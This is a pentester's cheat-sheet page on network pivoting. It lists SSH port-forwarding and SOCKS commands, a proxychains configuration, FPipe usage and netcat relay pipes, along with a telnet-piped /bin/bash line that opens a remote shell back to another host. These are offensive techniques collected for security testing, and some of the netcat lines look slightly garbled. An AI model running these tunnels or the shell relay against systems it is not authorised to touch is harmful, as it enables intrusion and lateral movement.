Pentest Misc Knowledge Pivoting (Port Fun)

February 23, 2021 at 12:46 AM Edit on GitHub

Pivoting (Port Fun)

Table of Contents

tags: Security Pivoting

Reference

NETSEC - Dynamic Port Forwarding(SSH) HighOn.Coffee - SSH & Meterpreter Pivoting Techique

Example

nc <== telnet /bin/bash telnet ==> nc

Machine A:
nc -lk -n -v 7777

Machine B:
telnet A.A.A.A 7777 | /bin/bash | telnet B.B.B.B 7777

Machine C:
nc -lk -n -v 7777

A:9000 <== ssh ==> C:80

Machine A:
ssh -i ~/.ssh/B.root.key -L9000:C.C.C.C:80 B.B.B.B

or

ssh B.B.B.B
<enter>
<enter>
~C
ssh> -L 9000:C.C.C.C:80

local:1080 socks5 <== ssh 10.10.10.75 ==> any

ssh -D1080 10.10.10.75
netstat -alnp | grep LIST | grep 1080
vim /etc/proxychains.conf
: [ProxyList]
: # add proxy here ...
: # meanwile
: # defaults set to "tor"
: #socks4         127.0.0.1 9050
: # metasploit
: #socks4         127.0.0.1 1080
: # ssh
: socks5  127.0.0.1 1080
proxychains curl -k https://10.10.10.60

temp

Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely

ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig